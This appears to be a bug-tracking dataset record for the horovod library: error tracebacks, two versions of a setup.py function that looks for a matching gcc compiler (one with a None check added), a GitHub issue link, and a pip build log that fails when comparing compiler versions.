d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:541: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint8 = np.dtype([("qint8", np.int8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:542: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint8 = np.dtype([("quint8", np.uint8, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:543: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint16 = np.dtype([("qint16", np.int16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:544: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_quint16 = np.dtype([("quint16", np.uint16, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:545: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _np_qint32 = np.dtype([("qint32", np.int32, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || /opt/conda/lib/python3.6/site-packages/tensorboard/compat/tensorflow_stub/dtypes.py:550: FutureWarning: Passing (type, 1) or '1type' as a synonym of type is deprecated; in a future version of numpy, it will be understood as (type, (1,)) / '(1,)type'.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || np_resource = np.dtype([("resource", np.ubyte, 1)])
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/tensorflow/__init__.py", line 43, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || has_gpu = gpu_available('tensorflow')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension tensorflow was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension torch was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/__init__.py", line 39, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || from horovod.torch.mpi_ops import allreduce, allreduce_async, allreduce_, allreduce_async_
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/torch/mpi_ops.py", line 80, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _has_gpu = gpu_available('torch')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 104, in gpu_available
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext_base_name, available_fn, 'running with GPU', verbose) or False
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 90, in _check_extension_lambda
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || p.start()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/multiprocessing/process.py", line 103, in start
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'daemonic processes are not allowed to have children'
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || AssertionError: daemonic processes are not allowed to have children
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension torch was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Checking whether extension mxnet was built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 73, in _target_fn
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ext = importlib.import_module('.' + ext_base_name, 'horovod')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/importlib/__init__.py", line 126, in import_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || return _bootstrap._gcd_import(name[level:], package, level)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 994, in _gcd_import
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 971, in _find_and_load
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 955, in _find_and_load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 665, in _load_unlocked
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap_external>", line 678, in exec_module
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "<frozen importlib._bootstrap>", line 219, in _call_with_frames_removed
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/mxnet/__init__.py", line 23, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || __file__, 'mpi_lib')
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 51, in check_extension
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || 'Horovod with %s=1 to debug the build error.' % (ext_name, ext_env_var))
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || ImportError: Extension horovod.mxnet has not been built. If this is not expected, reinstall Horovod with HOROVOD_WITH_MXNET=1 to debug the build error.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Extension mxnet was NOT built with Gloo.
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || Traceback (most recent call last):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/bin/horovodrun", line 21, in <module>
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || run_commandline()
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 860, in run_commandline
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _run(args)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 828, in _run
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || _launch_job(args, remote_host_names, settings, common_intfs, command)
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/run/run.py", line 850, in _launch_job
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || elif gloo_built(verbose=(settings.verbose >= 2)):
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || File "/opt/conda/lib/python3.6/site-packages/horovod/common/util.py", line 124, in gloo_built
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || raise RuntimeError('Failed to determine if Gloo support has been built. '
d996a8f8-e1d4-4e1e-8d9e-e3c5804c0369 || RuntimeError: Failed to determine if Gloo support has been built. Run again with --verbose for more details.
|
AssertionError
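
The AssertionError above is CPython's own guard: multiprocessing.BaseProcess.start() refuses to spawn a child from a process that is itself flagged as a daemon, which is what horovod's _check_extension_lambda probe runs into here. A standalone sketch of the same failure, assuming nothing beyond the standard library (the worker names are illustrative, not horovod code):

import multiprocessing

def child():
    pass

def daemon_worker():
    try:
        # BaseProcess.start() asserts the current process is not a daemon
        # before spawning, so this raises AssertionError.
        multiprocessing.Process(target=child).start()
    except AssertionError as e:
        print(e)  # daemonic processes are not allowed to have children

if __name__ == "__main__":
    worker = multiprocessing.Process(target=daemon_worker)
    worker.daemon = True  # mark as daemonic before starting
    worker.start()
    worker.join()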
|
def find_matching_gcc_compiler_path(gxx_compiler_version):
    for path_dir, bin_file in enumerate_binaries_in_path():
        if re.match("^gcc(?:-\\d+(?:\\.\\d+)*)?$", bin_file):
            # gcc, or gcc-7, gcc-4.9, or gcc-4.8.5
            compiler = os.path.join(path_dir, bin_file)
            compiler_version = determine_gcc_version(compiler)
            if compiler_version and compiler_version == gxx_compiler_version:
                return compiler
    print("INFO: Unable to find gcc compiler (version %s)." % gxx_compiler_version)
    return None
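
A quick standalone check of the filename pattern used above, with the candidate names taken from the comment in the code (an equivalent raw-string form of the same regex):

import re

pattern = re.compile(r"^gcc(?:-\d+(?:\.\d+)*)?$")
for name in ["gcc", "gcc-7", "gcc-4.9", "gcc-4.8.5", "gcc-ar", "g++"]:
    # Only plain gcc or gcc-<version> names match; gcc-ar and g++ are rejected.
    print(name, bool(pattern.match(name)))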
|
def find_matching_gcc_compiler_path(gxx_compiler_version):
    for path_dir, bin_file in enumerate_binaries_in_path():
        if re.match("^gcc(?:-\\d+(?:\\.\\d+)*)?$", bin_file):
            # gcc, or gcc-7, gcc-4.9, or gcc-4.8.5
            compiler = os.path.join(path_dir, bin_file)
            compiler_version = determine_gcc_version(compiler)
            if compiler_version == gxx_compiler_version:
                return compiler
    print("INFO: Unable to find gcc compiler (version %s)." % gxx_compiler_version)
    return None
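
The only difference between the two versions is the `compiler_version and` guard: determine_gcc_version() returns None when a candidate binary cannot be run, and comparing None against a distutils version object raises instead of returning False, exactly as the version.py frames in the traceback below show. A minimal sketch of the crash the patch prevents (the version string is hypothetical):

from distutils.version import LooseVersion  # distutils was removed in Python 3.12

gxx_compiler_version = LooseVersion("7.4.0")
compiler_version = None  # what determine_gcc_version() yields on failure

try:
    # None.__eq__ returns NotImplemented, so Python falls back to
    # LooseVersion.__eq__, whose _cmp() reads other.version off None.
    compiler_version == gxx_compiler_version
except AttributeError as e:
    print(e)  # 'NoneType' object has no attribute 'version'

# The patched guard short-circuits before the comparison runs:
if compiler_version and compiler_version == gxx_compiler_version:
    print("matching compiler found")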
|
https://github.com/horovod/horovod/issues/1334
|
Looking in indexes: https://pypi.tuna.tsinghua.edu.cn/simple/
Collecting horovod
Using cached https://pypi.tuna.tsinghua.edu.cn/packages/8f/d9/67e496de0e04d314bb4bf3621442880486a560ab4e682f1c24ec7bf3c9b6/horovod-0.17.0.post1.tar.gz
Requirement already satisfied: cloudpickle in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.1.1)
Requirement already satisfied: psutil in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (5.6.2)
Requirement already satisfied: six in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.12.0)
Requirement already satisfied: cffi>=1.4.0 in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from horovod) (1.12.3)
Requirement already satisfied: pycparser in /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages (from cffi>=1.4.0->horovod) (2.19)
Building wheels for collected packages: horovod
Running setup.py bdist_wheel for horovod ... error
Complete output from command /home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/bin/python3.7 -u -c "import setuptools, tokenize;__file__='/tmp/pip-install-c74kecsx/horovod/setup.py';f=getattr(tokenize, 'open', open)(__file__);code=f.read().replace('\r\n', '\n');f.close();exec(compile(code, __file__, 'exec'))" bdist_wheel -d /tmp/pip-wheel-c74z94_t --python-tag cp37:
running bdist_wheel
running build
running build_py
creating build
creating build/lib.linux-x86_64-3.7
creating build/lib.linux-x86_64-3.7/horovod
copying horovod/__init__.py -> build/lib.linux-x86_64-3.7/horovod
creating build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/_keras
copying horovod/_keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/_keras
creating build/lib.linux-x86_64-3.7/horovod/spark
copying horovod/spark/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark
creating build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
copying horovod/mxnet/__init__.py -> build/lib.linux-x86_64-3.7/horovod/mxnet
creating build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/compression.py -> build/lib.linux-x86_64-3.7/horovod/torch
copying horovod/torch/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch
creating build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/util.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/basics.py -> build/lib.linux-x86_64-3.7/horovod/common
copying horovod/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/common
creating build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/task_fn.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/mpi_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/gloo_run.py -> build/lib.linux-x86_64-3.7/horovod/run
copying horovod/run/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run
creating build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/keras
copying horovod/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/keras
creating build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/mpi_ops.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/util.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/compression.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
copying horovod/tensorflow/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow
creating build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/mpirun_exec_fn.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
copying horovod/spark/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/task
creating build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/mpirun_rsh.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
copying horovod/spark/driver/job_id.py -> build/lib.linux-x86_64-3.7/horovod/spark/driver
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
copying horovod/torch/mpi_lib/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib
creating build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
copying horovod/torch/mpi_lib_impl/__init__.py -> build/lib.linux-x86_64-3.7/horovod/torch/mpi_lib_impl
creating build/lib.linux-x86_64-3.7/horovod/run/common
copying horovod/run/common/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common
creating build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/task
copying horovod/run/task/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/task
creating build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/threads.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/cache.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/util
copying horovod/run/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/util
creating build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
copying horovod/run/rendezvous/http_server.py -> build/lib.linux-x86_64-3.7/horovod/run/rendezvous
creating build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
copying horovod/run/driver/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/driver
creating build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/task_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/driver_service.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
copying horovod/run/common/service/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/service
creating build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/env.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/secret.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/codec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/timeout.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/__init__.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/safe_shell_exec.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/settings.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/host_hash.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
copying horovod/run/common/util/network.py -> build/lib.linux-x86_64-3.7/horovod/run/common/util
creating build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/callbacks.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
copying horovod/tensorflow/keras/__init__.py -> build/lib.linux-x86_64-3.7/horovod/tensorflow/keras
running build_ext
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_cpp_flags.so
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_link_flags.cc -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib -Wl,--version-script=horovod.lds build/temp.linux-x86_64-3.7/test_compile/test_link_flags.o -o build/temp.linux-x86_64-3.7/test_compile/test_link_flags.so
INFO: Unable to build TensorFlow plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1375, in build_extensions
build_tf_extension(self, options)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 851, in build_tf_extension
check_tf_version()
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 79, in check_tf_version
'import tensorflow failed, is it installed?\n\n%s' % traceback.format_exc())
distutils.errors.DistutilsPlatformError: import tensorflow failed, is it installed?
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 72, in check_tf_version
import tensorflow as tf
ModuleNotFoundError: No module named 'tensorflow'
gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC -std=c++11 -fPIC -O2 -Wall -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -I/usr/local/include -pthread -Wl,-rpath -Wl,/usr/local/lib -Wl,--enable-new-dtags -L/usr/local/lib -lmpi -Ithird_party/HTTPRequest/include -Ithird_party/boost/assert/include -Ithird_party/boost/config/include -Ithird_party/boost/core/include -Ithird_party/boost/detail/include -Ithird_party/boost/iterator/include -Ithird_party/boost/lockfree/include -Ithird_party/boost/mpl/include -Ithird_party/boost/parameter/include -Ithird_party/boost/predef/include -Ithird_party/boost/preprocessor/include -Ithird_party/boost/static_assert/include -Ithird_party/boost/type_traits/include -Ithird_party/boost/utility/include -Ithird_party/eigen -Ithird_party/flatbuffers/include -Ithird_party/lbfgs/include -Ithird_party/gloo -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/torch/csrc/api/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/TH -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/lib/python3.7/site-packages/torch/include/THC -I/usr/local/cuda/include -I/home/wyz/.pyenv/versions/3.7.2/envs/env-3.7.2/include -I/home/wyz/.pyenv/versions/3.7.2/include/python3.7m -c build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.cc -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o
gcc -pthread -shared -L/home/wyz/.pyenv/versions/3.7.2/lib -L/home/wyz/.pyenv/versions/3.7.2/lib build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.o -o build/temp.linux-x86_64-3.7/test_compile/test_torch_cuda.so
/bin/sh: 1: /usr/lib/gcc: Permission denied
INFO: Unable to determine version of the compiler /usr/lib/gcc.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 767, in determine_gcc_version
shell=True, universal_newlines=True).split('\n')
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 395, in check_output
**kwargs).stdout
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/subprocess.py", line 487, in run
output=stdout, stderr=stderr)
subprocess.CalledProcessError: Command '/usr/lib/gcc -dM -E - </dev/null' returned non-zero exit status 126.
INFO: Unable to build PyTorch plugin, will skip it.
Traceback (most recent call last):
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1389, in build_extensions
build_torch_extension_v2(self, options, torch_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 1274, in build_torch_extension_v2
find_matching_gcc_compiler_path(candidate_compiler_version)
File "/tmp/pip-install-c74kecsx/horovod/setup.py", line 801, in find_matching_gcc_compiler_path
if compiler_version == gxx_compiler_version:
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 46, in __eq__
c = self._cmp(other)
File "/home/wyz/.pyenv/versions/3.7.2/lib/python3.7/distutils/version.py", line 335, in _cmp
if self.version == other.version:
AttributeError: 'NoneType' object has no attribute 'version'
-- The CXX compiler identification is GNU 7.4.0
-- The C compiler identification is GNU 7.4.0
-- Check for working CXX compiler: /usr/bin/c++
-- Check for working CXX compiler: /usr/bin/c++ -- works
-- Detecting CXX compiler ABI info
-- Detecting CXX compiler ABI info - done
-- Detecting CXX compile features
-- Detecting CXX compile features - done
-- Check for working C compiler: /usr/bin/cc
-- Check for working C compiler: /usr/bin/cc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Detecting C compile features
-- Detecting C compile features - done
-- Found MPI_C: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI_CXX: /usr/local/lib/libmpi.so (found version "3.1")
-- Found MPI: TRUE (found version "3.1")
-- MPI include path: /usr/local/include
-- MPI libraries: /usr/local/lib/libmpi.so
-- Configuring done
-- Generating done
-- Build files have been written to: /tmp/pip-install-c74kecsx/horovod/build/temp.linux-x86_64-3.7/gloo/mxnet
Scanning dependencies of target gloo
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgatherv.cc.o
[ 6%] Building CXX object gloo/CMakeFiles/gloo.dir/allgather.cc.o
[ 9%] Building CXX object gloo/CMakeFiles/gloo.dir/algorithm.cc.o
[ 12%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce.cc.o
[ 15%] Building CXX object gloo/CMakeFiles/gloo.dir/allreduce_local.cc.o
[ 18%] Building CXX object gloo/CMakeFiles/gloo.dir/barrier.cc.o
[ 21%] Building CXX object gloo/CMakeFiles/gloo.dir/broadcast.cc.o
[ 24%] Building CXX object gloo/CMakeFiles/gloo.dir/context.cc.o
[ 27%] Building CXX object gloo/CMakeFiles/gloo.dir/gather.cc.o
[ 30%] Building CXX object gloo/CMakeFiles/gloo.dir/reduce.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/scatter.cc.o
[ 36%] Building CXX object gloo/CMakeFiles/gloo.dir/types.cc.o
[ 39%] Building CXX object gloo/CMakeFiles/gloo.dir/common/linux.cc.o
